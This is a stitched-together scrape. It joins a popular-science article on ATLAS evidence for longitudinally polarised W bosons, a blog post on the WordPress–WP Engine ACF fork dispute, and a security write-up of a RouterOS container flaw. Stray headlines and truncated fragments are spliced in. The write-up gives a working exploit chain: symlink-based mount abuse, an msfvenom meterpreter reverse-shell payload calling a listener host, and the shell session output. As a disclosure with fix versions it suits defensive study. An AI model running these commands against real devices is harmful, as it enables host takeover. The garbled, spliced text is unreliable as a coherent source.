At the heart of particle physics lies the Standard Model, a theory that has stood for nearly half a century as the best description of the subatomic realm. It tells us what particles exist, how they interact, and why the universe is stable at the smallest scales. The Standard Model has correctly predicted the outcomes of several experiments testing the limits of particle physics. Even then, however, physicists know that it's incomplete: it can't explain dark matter, why matter dominates over antimatter, and why the force of gravity is so weak compared to the other forces. To settle these mysteries, physicists have been conducting very detailed tests of the Model, each of which has either tightened their confidence in a hypothetical explanation or has revealed a new piece of the puzzle.

A central character in this story is a subatomic particle called the W boson — the carrier of the weak nuclear force. Without it, the Sun wouldn't shine because particle interactions involving the weak force are necessary for nuclear fusion to proceed. W bosons are also unusual among force carriers: unlike photons (the particles of light), they're massive, about 80-times heavier than a proton. This mass difference — of a massless photon and a massive W boson — arises due to a process called the Higgs mechanism. Physicists first proposed this mechanism in 1964 and confirmed it was real when they found the Higgs boson particle at the Large Hadron Collider (LHC) in 2012.

But finding the Higgs particle was only the beginning. To prove that the Higgs mechanism really works the way the theory says, physicists need to check its predictions in detail. One of the sharpest tests involves how W bosons scatter off each other at high energies. Both photons and W bosons have a property called quantum spin, but whereas for photons its value is zero, for W bosons its non-zero. The spin also has a direction. If it points sideways, the W boson is said to be transverse polarised; if it's pointing along the particle's direction of travel, the W boson is said to be longitudinally polarised. The longitudinal ones are special because their behaviour is directly tied to the Higgs mechanism.

Specifically, if the Higgs mechanism and the Higgs boson don't exist, calculations involving the longitudinal W bosons scattering off of each other quickly give rise to nonsensical mathematical results in the theory. The Higgs boson acts like a regulator in this engine, preventing the mathematics from 'blowing up'. In fact, in the 1970s, the theoretical physicists Benjamin Lee, Chris Quigg, and Hugh Thacker showed that without the Higgs boson, the weak force would become uncontrollably powerful at high energies, leading to the breakdown of the theory. Their work was an important theoretical pillar that justified building the colossal LHC machine to search for the Higgs boson particle.

Technical foundation for a muon collider laid at J-PARC

A particle collider is a machine that energises two beams of subatomic particles and smashes them head on. The Large Hadron Collider (LHC) in Europe is the world’s largest and most famous particle collider. It accelerates (with the effect of energising) two beams of protons to nearly the speed of

XorlandVM

The terms Higgs boson, Higgs field, and Higgs mechanism describe related but distinct ideas. The Higgs field is a kind of invisible medium thought to fill all of space. Particles like W bosons and Z bosons interact with this field as they move and through that interaction they acquire mass. This is the Higgs mechanism: the process by which particles that would otherwise be massless become heavy.

The Higgs boson is different: it's a particle that represents a vibration or a ripple in the Higgs field, just as a photon is a ripple in the electromagnetic field. Its discovery in 2012 confirmed that the field is real and not just something that appears in the mathematics of the theory. But discovery alone doesn't prove the mechanism is doing everything the theory demands. To test that, physicists need to look at situations where the Higgs boson's balancing role is crucial.

The scattering of longitudinally polarised W bosons is a good example. Without the Higgs boson, the probabilities of the scatterings occurring uncontrollably at higher energy, but with the Higgs boson in the picture, they stay within sensible bounds. Observing longitudinally polarised W bosons behaving as predicted is thus evidence for the particle as well as a check on the field and the mechanism behind it.

Imagine a roller-coaster without brakes. As it goes faster and faster, there's nothing to stop it from flying off the tracks. The Higgs mechanism is like the braking system that keeps the ride safe. Observing longitudinally polarised W bosons in the right proportions is equivalent to checking that the brakes actually work when the roller-coaster speeds up.

Another path that physicists once considered and that didn't involve a Higgs boson at all was called technicolor theory. Instead of a single kind of Higgs boson giving the W bosons their mass, technicolor proposed a brand-new force. Just as the strong nuclear force binds quarks into protons and neutrons, the hypothetical technicolor force would bind new "technifermion" particles into composite states. These bound states would mimic the Higgs boson's job of giving particles mass, while producing their own new signals in high-energy collisions.

The crucial test to check whether some given signals are due to the Higgs boson or due to technicolor lies in the behaviour of longitudinally polarised W bosons. In the Standard Model, their scattering is kept under control by the Higgs boson's balancing act. In technicolor, by contrast, there is no Higgs boson to cancel the runaway growth. The probability of the scattering of longitudinally polarised W bosons would therefore rise sharply with more energy, often leaving clearly excessive signals in the data.

Thus, observing longitudinally polarised W bosons at levels consistent with the predictions of the Standard Model, and not finding any additional signals, would also strengthen the case for the Higgs mechanism and weaken that for technicolor and other "Higgs-less" theories.

At the Large Hadron Collider, the cleanest way to study look for such W bosons is in a phenomenon called vector boson scattering (VBS). In VBS, two protons collide and the quarks inside them emit W bosons. These W bosons then scatter off each other before decaying into lighter particles. The leftover quarks form narrow sprays of particles, or 'jets', that fly far forward.

If the two W bosons happen to have the same electric charge — i.e. both positive or both negative — the process is even more distinctive. This same-sign WW scattering is quite rare and that's an advantage because then it's easy to spot in the debris of particle collisions.

Both ATLAS and CMS, the two giant detectors at the LHC, had previously observed same-sign WW scattering without breaking down the polarisation. In 2021, the CMS detector reported the first hint of longitudinal polarisation but at a statistical significance only of 2.3 sigma, which isn't good enough (particle physicists prefer at least 3 sigma). So after the LHC completed its second run in 2018, collecting data from around 10 quadrillion collisions between protons, the ATLAS collaboration set out to analyse it and deliver the evidence. This group's study was published in Physical Review Letters on September 10.

The challenge of finding longitudinally polarised W bosons is like finding a particular needle in a very large haystack where most of the needles look nearly identical. So ATLAS designed a special strategy.

When one W boson decays, the result is one electron or muon and one neutrino. If the W boson is positively charged, for example, the decay could be to one anti-electron and one electron-neutrino or to one anti-muon and a muon-neutrino. Anti-electrons and anti-muons are positively charged. If the W boson is negatively charged, the products could be one electron and one electron-antineutrino or one muon and one muon-antineutrino. So first, ATLAS zeroed in on the fact that it was looking for two electrons, two muons or one of each, both carrying the same electric charge. Neutrinos however are really hard to catch and study, so the ATLAS group looked for their absence rather than their presence. In all these particle interactions, the law of conservation of momentum holds — which means in a given interaction, a neutrino's presence can be elucidated when the momenta of the electrons or muons add up to be slightly lower than that of the W boson. The missing amount would have been carried away by the neutrino, like money unaccounted for in a ledger.

This analysis also required an event of interest to have at least two jets (reconstructed from streams of particles) with a combined energy above 500 GeV and separated widely in rapidity (which is a measure of their angle relative to the beam). This particular VBS pattern — two electrons/muons, two jets, and missing momentum — is the hallmark of same-sign WW scattering.

Second, even with these strict requirements, impostors can creep in. The biggest source of confusion was WZ production, a process in which another subatomic particle called the Z boson decays invisibly or one of its decay products goes unnoticed, making the event resemble WW scattering. Other sources include electrons having their charges mismeasured, jets can masquerading as electrons/muons, and some quarks producing electrons/muons that slip into the sample. To control for all this noise, the ATLAS group focused on control regions: subsets of events that produced a distinct kind of noise that the group could cleanly 'subtract' from the data to reveal same-sign WW scattering, thus also reducing uncertainty in the final results.

Third, and this is where things get nuanced: the differences between transverse and longitudinally polarised W bosons show up in distributions — i.e. how far apart the electrons/muons are in angle, how the jets are oriented, and the energy of the system. But since no single variable could tell the whole story, the ATLAS group combined them using deep neural networks. These machine-learning models were fed up to 20 kinematic variables — including jet separations, particle angles, and missing momentum patterns — and trained to distinguish between three groups:

(i) Two transverse polarised W bosons;

(ii) One transverse polarised W boson and one longitudinally polarised W boson; and

(iii) Both longitudinally polarised W bosons

Fourth, the group combined the outputs of these neural networks and fit them with a maximum likelihood method. When physicists make measurements, they often don't directly see what they're measuring. Instead, they see data points that could have come from different possible scenarios. A likelihood is a number that tells them how probable the data is in a given scenario. If a model says "events should look like this," they can ask: "Given my actual data, how likely is that?" And the maximum likelihood method will help them decide the parameters that make the given data most likely to occur.

For example, say you toss a coin 100 times and get 62 heads. You wonder: is the coin fair or biased? If it's fair, the chance of exactly 62 heads is small. If the coin is slightly biased (heads with probability 0.62), the chance of 62 heads is higher. The maximum likelihood estimate is to pick the bias, or probability of heads, that makes your actual result most probable. So here the method would say, "The coin's bias is 0.62" — because this choice maximises the likelihood of seeing 62 heads out of 100.

In their analysis, the ATLAS group used the maximum likelihood method to check whether the LHC data 'preferred' a contribution from longitudinal scattering, after subtracting what background noise and transverse-only scattering could explain.

The results may be a milestone in experimental particle physics. In the September 10 paper, ATLAS reported evidence for longitudinally polarised W bosons in same-sign WW scattering with a significance of 3.3 sigma — sufficiently close to 4, which is the calculated significance based on the predictions of the Standard Model. This means the data behaved as theory predicted, with no unexpected excess or deficit.

It's also bad news for technicolor theory. By observing longitudinal W bosons at exactly the rates predicted by the Standard Model, and not finding any additional signals, the ATLAS data strengthens the case for the Higgs mechanism providing the check on the W bosons' scattering probability, rather than the technicolor force.

The measured cross-section for events with at least one longitudinally polarised W boson was 0.88 femtobarns, with an uncertainty of 0.3 femtobarns. These figures essentially mean that there were only a few hundred same-sign WW scattering events in the full dataset of around 10 quadrillion proton-proton collisions. The fact that ATLAS could pull this signal out of such a background-heavy environment is a testament to the power of modern machine learning working with advanced statistical methods.

The group was also able to quantify the composition of signals. Among others:

1. About 58% of events were genuine WW scattering
2. Roughly 16% were from WZ production
3. Around 18% arose from irrelevant electrons/muons, charge misidentification or the decay of energetic photons

One way to appreciate the importance of these findings is by analogy: imagine trying to hear a faint melody being played by a single violin in the middle of a roaring orchestra. The violin is the longitudinal signal; the orchestra is the flood of background noise. The neural networks are like sophisticated microphones and filters, tuned to pick out the violin's specific tone. The fact that ATLAS couldn't only hear it but also measured its volume to match the score written by the Standard Model is remarkable.

These results are more than just another tick mark for the Standard Model. They're a direct test of the Higgs mechanism in action. The discovery of the Higgs boson particle in 2012 was groundbreaking but proving that the Higgs mechanism performs its theoretical role requires demonstrating that it regulates the scattering of W bosons. By finding evidence for longitudinally polarised W bosons at the expected rate, ATLAS has done just that.

The results also set the stage for the future. The LHC is currently being upgraded to a form called the High-Luminosity LHC and it will begin operating later this decade, collecting datasets about 10x larger than what the LHC did in its second run. With that much more data, physicists will be able to study differential distributions, i.e. how the rate of longitudinal scattering varies with energy, angle or jet separation. These patterns are sensitive to hitherto unknown particles and forces, such as additional Higgs-like particles or modifications to the Higgs mechanism itself. And even small deviations from the Standard Model's predictions could hint at new frontiers in particle physics.

Indeed, history has often reminded physicists that such precision studies often uncover surprises. For example physicists didn't discover neutrino oscillations by finding a new particle but by noticing that the number of neutrinos arriving from the Sun at detectors on Earth didn't match expectations. Similarly, minuscule mismatches between theory and observations in the scattering of W bosons could someday reveal new physics — and if they do, the seeds will have been planted by studies like that of the ATLAS group.

Challenging the neutrino signal anomaly

A gentle reminder before we begin: you’re allowed to be interested in particle physics. 😉 Neutrinos are among the most mysterious particles in physics. They are extremely light, electrically neutral, and interact so weakly with matter that trillions of them pass through your body each second without leaving a trace. They

XorlandVM

On the methodological front, the analysis also showcases how particle physics is evolving. 'Classical' analyses once banked on tracking single variables; now, deep learning has played a starring role by combining many variables into a single discriminant, allowing ATLAS to pull the faint signal of longitudinally polarised W bosons from the noise. This approach could only become more important as both datasets and physicists' ambitions expand.

Perhaps the broadest lesson in all this is that science often advances by the unglamorous task of verifying the details. The discovery of the Higgs boson answered one question but opened many others; among them, measuring how it affects the scattering of W bosons is one of the more direct ways to probe whether the Standard Model is complete or just the first chapter of a longer story. Either way, the pursuit exemplifies the spirit of checking, rechecking, testing, and probing until scientists truly understand how nature works at extreme precision.

A bit of background, for those not steeped in the world of WordPress development: there exists a plugin called Advanced Custom Fields (ACF) which allows developers to create near-endless customization options for end clients in the standard page and post editor. It is hard to explain in a single paragraph — the WordPress.com guide is a good overview — but its utility is so singular as to be an essential component for many WordPress developers.

ACF was created by Elliot Condon who, in 2021, sold it to Delicious Brains. At this point, it was used on millions of websites, a few of which I built. I consider it near-irreplaceable for some specific and tricky development tasks. A year later, the entire Delicious Brains plugin catalogue was sold to WPEngine.

Matt Mullenweg:

On behalf of the WordPress security team, I am announcing that we are invoking point 18 of the plugin directory guidelines and are forking Advanced Custom Fields (ACF) into a new plugin, Secure Custom Fields. SCF has been updated to remove commercial upsells and fix a security problem.

[…]

Similar situations have happened before, but not at this scale. This is a rare and unusual situation brought on by WP Engine’s legal attacks, we do not anticipate this happening for other plugins.

This is an awfully casual way of announcing WordPress is hijacking one of the most popular third-party plugins in the directory. Mullenweg cites policy for doing so — WordPress can “make changes to a plugin, without developer consent, in the interest of public safety” — but the latter paragraph I quoted above makes clear the actual motive here. The “security problem” triggering this extraordinary action is a real but modest change to expand a patch from a previous update. But WordPress has removed the ability for WPEngine to make money off its own plugin — and if users have automatic plugin updates turned on, their ACF installation will be overwritten with WordPress’ unauthorized copy.

Iain Poulson, of ACF:

The change to our published distribution, and under our ‘slug’ which uniquely identifies the ACF plugin and code that our users trust in the WordPress.org plugin repository, is inconsistent with open source values and principles. The change made by Mullenweg is maliciously being used to update millions of existing installations of ACF with code that is unapproved and untrusted by the Advanced Custom Fields team.

It is nearly impossible to get me to feel sympathetic for anything touched by private equity, but Mullenweg has done just that. He really is burning all goodwill for reasons I cannot quite understand. I do understand the message he is sending, though: Mullenweg is prepared to use the web’s most popular CMS and any third-party contributions as his personal weapon. Your carefully developed plugin is not safe in the WordPress ecosystem if you dare cross him or Automattic.

⌥ Permalink

I have been trying to stay informed of the hostile relationship between WordPress, Automattic, and Matt Mullenweg, and third-party hosting company WPEngine. Aram Zucker-Scharff put together a helpful and massive set of links to news coverage. Michael Tsai has a good collection of links, too, and Emma Roth and Samantha Cole have published notable articles.

From a distance, it looks like an expensive pissing match between a bunch of increasingly unlikable parties, and I would very much appreciate if it never affects my self-hosted version of WordPress. Maybe it is a little confusing that WPEngine is not affiliated with WordPress, but I only learned this week that WordPress.org is personally owned by Mullenweg and is not actually affiliated with Automattic or WordPress.com. From Mullenweg’s perspective, this confusion is beneficial, but the confusion with WPEngine is not. From my perspective, I would not like to be confused.

Also, if Mullenweg is mad about WPEngine — and Silver Lake, its private equity owner — benefitting from the open source nature of WordPress without what he feels is adequate compensation, I am not sure he has a leg to stand on. It does not sound like WPEngine is doing anything illegal. It is perhaps rude or immoral to build a private business named after and on the back of an open source project without significantly contributing, but surely that is the risk of developing software with that license. I am probably missing something here.

⌥ Permalink

RouterOS release 7.4beta4 introduced containers for MikroTik devices. From the changelog:

container - added support for running Docker (TM) containers on ARM, ARM64 and x86

It turns out that due to a couple of implementation flaws, it's possible to execute code on the host device via the container functionality.

Mount points

In the MikroTik documentation, it is shown that it's possible to create mount points between the host and the container. As an example, the etc folder on disk1 is mounted into /etc/pihole in the container:

/container/mounts/add name=etc_pihole src=disk1/etc dst=/etc/pihole

While playing around with this feature, I soon realized that the current implementation has three specific behaviour details which makes the feature rather dangerous.

1. Paths are resolved through symlinks

Let's, for example, take the following directory structure:

disk1/
├── dir1/
│   ├── file1
│   └── file2
└── dir2/ --(symbolic link)--> dir1/

Even though dir2 is a symbolic link to dir1, adding a mount point to disk1/dir2/file1 works, meaning that dir2 is resolved to dir1 before the file is mounted.

2. Symlinks are resolved relative to the host device's root, not the container's root

Let's say my container's root filesystem is stored in disk1/alpine. If I do the following inside the container:

# ln -s / /rootfs

… then inside the container, the directory /rootfs resolves to / as expected. However, if I then use this directory as a mount point source when setting the container up in RouterOS, then the symbolic link is resolved in relation to the device's own filesystem.

As an example, I'll mount the host filesystem inside the container's /mnt directory:

/container/mounts/add name=rootfs src=/disk1/alpine/rootfs dst=/mnt

Then, from inside the created container, I can access the host's root filesystem:

# ls -l /mnt
total 0
drwxr-xr-x    2 nobody   nobody         149 Jun 15 11:38 bin
drwxr-xr-x    9 nobody   nobody         131 Jun 15 11:38 bndl
drwxr-xr-x    2 nobody   nobody           3 Jun 15 11:38 boot
drwxr-xr-x    2 nobody   nobody           3 Jun 15 11:38 dev
lrwxrwxrwx    1 nobody   nobody          11 Jun 15 11:38 dude -> /flash/dude
drwxr-xr-x    2 nobody   nobody         352 Jun 15 11:38 etc
drwxr-xr-x    2 nobody   nobody           3 Jun 15 11:38 flash
drwxr-xr-x    3 nobody   nobody          26 Jun 15 11:38 home
drwxr-xr-x    3 nobody   nobody         403 Jun 15 11:38 lib
drwxr-xr-x    5 nobody   nobody          73 Jun 15 11:38 nova
lrwxrwxrwx    1 nobody   nobody           9 Jun 15 11:38 pckg -> /ram/pckg
drwxr-xr-x    2 nobody   nobody           3 Jun 15 11:38 proc
drwxr-xr-x    2 nobody   nobody           3 Jun 15 11:38 ram
lrwxrwxrwx    1 nobody   nobody           9 Jun 15 11:38 rw -> /flash/rw
drwxr-xr-x    2 nobody   nobody          45 Jun 15 11:38 sbin
drwxr-xr-x    2 nobody   nobody           3 Jun 15 11:38 sys
lrwxrwxrwx    1 nobody   nobody           7 Jun 15 11:38 tmp -> /rw/tmp
drwxr-xr-x    5 nobody   nobody         111 Jun 15 11:38 var

While it's possible to read files, most of the filesystem is read-only, meaning it's not possible to write files. However…

3. Symlinks are resolved for both the src and dst parameters

What this effectively means is that by using this same rootfs symlink in the dst parameter, it is possible to mount any arbitrary directory or file from any location (even from inside the container) to any location on the host filesystem.

As an example, I create a mount point that mounts a robots.txt file from inside the container to the webfig directory, effectively "overwriting" the existing robots.txt:

/container/mounts/add name=robots src=/disk1/alpine/robots.txt dst=/rootfs/home/web/robots.txt

Then, on a third machine, we verify that it was overwritten using curl:

$ curl router.lan/robots.txt
Hello from inside the container!

Exploitation

Mount-what-where is a very powerful primitive. It should be relatively easy to run arbitrary code - just mount over a preexisting executable on the system that gets executed by the device at some point.

However, that won't work, because of how the mount point is created. From /proc/mounts:

/dev/sda1 /nova/bin/telnet ext4 rw,nosuid,nodev,noexec,relatime 0 0

The mount point is created with the nosuid, nodev, and most importantly noexec options. This means that even if you were to mount over an existing binary, it would never get executed, and would instead fail with a "Permission denied" every time. This also extends to shared libraries, so mounting over .so files is also out of the question.

I also didn't spot any obvious config files which would allow running code.

This is where symlinks come to the rescue yet again.

As it turns out, symlinks existing on noexec filesystems but pointing to binaries existing on filesystems without noexec will still be executed:

$ cp $(which id) id1
$ ln -s $(which id) id2
$ ./id1
bash: ./id1: Permission denied
$ ./id2
uid=1000(xx) gid=1000(xx) groups=1000(xx)

This means that we can simply mount a symbolic link over a specific executable that points to the malicious binary we want to run, assuming it is accessible from some mount point that doesn't have the noexec flag set. By looking at /proc/mounts, we can see that the container's own root filesystem is actually not mounted with noexec (which makes sense - you wouldn't be able to run executables inside the container otherwise):

/dev/sda1 /flash/rw/container/aa10a963-9715-4c61-967c-7d9f993410e6/root ext4 rw,nosuid,nodev,relatime 0 0

This is all we need to mount a successful attack. As the malicious binary, I generated a meterpreter/reverse_tcp ELF:

msfvenom -p linux/armle/meterpreter/reverse_tcp LHOST=10.4.0.245 LPORT=1338 -f elf > rev

I copied this inside the container and also created a symlink pointing to its location in the executable mount point:

ln -s /flash/rw/container/aa10a963-9715-4c61-967c-7d9f993410e6/root/rev /revlnk

As the target binary, I decided to use telnet, as it's relatively low-priority and easy to trigger and debug. I then created the mount point in RouterOS:

/container/mounts/add name=telnet src=/disk1/alpine/revlnk dst=/rootfs/nova/bin/telnet

After starting the container, the binary /nova/bin/telnet was mounted over and was instead a symlink to our malicious binary:

/nova/bin/telnet -> /flash/rw/container/aa10a963-9715-4c61-967c-7d9f993410e6/root/rev

As expected, after running /system/telnet 127.0.0.1 on the device, I got a connection in my Meterpreter listener:

msf6 exploit(multi/handler) > exploit

[*] Started reverse TCP handler on 10.4.0.245:1338
[*] Sending stage (908480 bytes) to 10.4.0.1
[*] Meterpreter session 1 opened (10.4.0.245:1338 -> 10.4.0.1:59434) at 2022-06-21 10:24:34 +0300

meterpreter > ls
Listing: /
==========

Mode              Size  Type  Last modified              Name
----              ----  ----  -------------              ----
040755/rwxr-xr-x  149   dir   2022-06-15 14:38:21 +0300  bin
040755/rwxr-xr-x  131   dir   2022-06-15 14:38:21 +0300  bndl
040755/rwxr-xr-x  3     dir   2022-06-15 14:38:21 +0300  boot
040755/rwxr-xr-x  6140  dir   2022-06-20 21:41:47 +0300  dev
                                                         dude
040755/rwxr-xr-x  352   dir   2022-06-15 14:38:21 +0300  etc
040755/rwxr-xr-x  1024  dir   2022-06-20 21:41:14 +0300  flash
040755/rwxr-xr-x  26    dir   2022-06-15 14:38:21 +0300  home
040755/rwxr-xr-x  403   dir   2022-06-15 14:38:21 +0300  lib
040755/rwxr-xr-x  73    dir   2022-06-15 14:38:21 +0300  nova
040755/rwxr-xr-x  200   dir   1970-01-01 03:00:12 +0300  pckg
040555/r-xr-xr-x  0     dir   1970-01-01 03:00:00 +0300  proc
041777/rwxrwxrwx  400   dir   2022-06-21 08:33:07 +0300  ram
040755/rwxr-xr-x  1024  dir   1970-01-01 03:00:14 +0300  rw
040755/rwxr-xr-x  45    dir   2022-06-15 14:38:21 +0300  sbin
040555/r-xr-xr-x  0     dir   1970-01-01 03:00:12 +0300  sys
040644/rw-r--r--  1024  dir   1970-01-01 03:00:19 +0300  tmp
040755/rwxr-xr-x  111   dir   2022-06-15 14:38:21 +0300  var

This means we can successfully execute arbitrary code on the device.

The issue is fixed in RouterOS versions 7.4beta5, 7.4, 7.5beta1, and higher.